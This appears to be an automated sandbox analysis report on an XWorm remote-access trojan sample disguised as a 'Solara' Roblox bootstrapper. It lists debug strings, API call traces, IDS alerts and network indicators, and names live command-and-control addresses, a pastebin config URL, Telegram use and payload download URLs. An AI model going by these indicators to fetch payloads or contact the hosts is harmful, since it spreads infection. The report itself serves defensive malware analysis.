                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: 8svMXMXNRn.exe, 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmp, 8svMXMXNRn.exe, 00000000.00000003.2031085342.000001E9E40EE000.00000004.00000020.00020000.00000000.sdmp, 8svMXMXNRn.exe, 00000000.00000003.2029686110.000001E9E5746000.00000004.00000020.00020000.00000000.sdmp, 8svMXMXNRn.exe, 00000000.00000000.2028449384.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: voosiq.exe, 00000021.00000002.3973688259.00007FF789DEB000.00000002.00000001.01000000.00000015.sdmp, voosiq.exe, 00000021.00000000.3933474079.00007FF789DEB000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: gC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: nC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: }C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E8A2000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: zC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: xC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.pdb source: BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E8A2000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbvR source: BootstrapperV21.exe, 00000002.00000002.4870582452.000000001C3E0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373BB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6373BB190
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6373A40BC
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373CFCA0 FindFirstFileExA,0_2_00007FF6373CFCA0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DCECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,33_2_00007FF789DCECE0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DB647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,33_2_00007FF789DB647C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DE3130 FindFirstFileExA,33_2_00007FF789DE3130
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C522C2h2_2_00007FF848C520FD
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C5C9C3h2_2_00007FF848C5C3BD
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C5C9D4h2_2_00007FF848C5C3BD
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C53364h2_2_00007FF848C52CE9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C53375h2_2_00007FF848C52CE9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C53FA7h2_2_00007FF848C4DE30
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C53FA7h2_2_00007FF848C4DE30
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 0000002Dh2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000046h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000055h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000063h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000071h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C6C8DBh2_2_00007FF848C5D750
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C58ACBh2_2_00007FF848C5880E
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 0000002Dh2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000046h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000055h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000063h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000071h2_2_00007FF848C55FC9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then dec eax2_2_00007FF848C5C206
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C5D6C5h2_2_00007FF848C5D621
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C68714h2_2_00007FF848C5D738
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 4x nop then jmp 00007FF848C68725h2_2_00007FF848C5D738

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.5:50002 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 147.185.221.23:1764 -> 192.168.2.5:50002
                      Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.5:50003 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50003 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:1764 -> 192.168.2.5:50002
                      Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.23:1764 -> 192.168.2.5:50002
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50002 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50002 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:1764 -> 192.168.2.5:50006
                      Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.5:50012 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50012 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:1764 -> 192.168.2.5:50012
                      Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.5:50013 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50013 -> 147.185.221.23:1764
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:1764 -> 192.168.2.5:50013
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:1764 -> 192.168.2.5:50003
                      Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49999 -> 149.154.167.220:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 127.0.0.1
                      Source: Malware configuration extractorURLs: cash-hispanic.gl.at.ply.gg
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 2.0.BootstrapperV21.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.5:50002 -> 147.185.221.23:1764
                      Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/ZESVzSgK HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                      Source: global trafficHTTP traffic detected: GET /download/static/files/Bootstrapper.exe HTTP/1.1Host: 79c62fd6.solaraweb-alj.pages.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                      Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
